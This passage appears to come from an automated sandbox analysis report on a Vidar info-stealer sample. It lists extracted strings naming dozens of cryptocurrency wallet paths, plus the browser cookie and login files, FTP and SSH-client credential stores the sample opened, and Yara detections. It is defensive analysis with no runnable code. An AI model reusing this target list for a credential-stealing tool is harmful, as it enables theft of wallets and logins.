                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685626702.0000000000CF1000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *exodus*.*
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685626702.0000000000CF1000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *ethereum*.*
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Tries to harvest and steal Bitcoin Wallet information
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Source: Yara matchFile source: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: UMrFwHyjUi.exe PID: 5768, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.2.UMrFwHyjUi.exe.1c2c60.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.UMrFwHyjUi.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.UMrFwHyjUi.exe.1c2c60.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.UMrFwHyjUi.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.UMrFwHyjUi.exe.190000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: UMrFwHyjUi.exe PID: 1004, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: UMrFwHyjUi.exe PID: 5768, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC30C40 sqlite3_bind_zeroblob,2_2_6CC30C40
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC30D60 sqlite3_bind_parameter_name,2_2_6CC30D60
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB58EA0 sqlite3_clear_bindings,2_2_6CB58EA0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC30B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,2_2_6CC30B40
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB56410 bind,WSAGetLastError,2_2_6CB56410
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB560B0 listen,WSAGetLastError,2_2_6CB560B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB5C030 sqlite3_bind_parameter_count,2_2_6CB5C030
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB56070 PR_Listen,2_2_6CB56070
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB5C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,2_2_6CB5C050
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAE22D0 sqlite3_bind_blob,2_2_6CAE22D0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB563C0 PR_Bind,2_2_6CB563C0

                          Mitre Att&ck Matrix

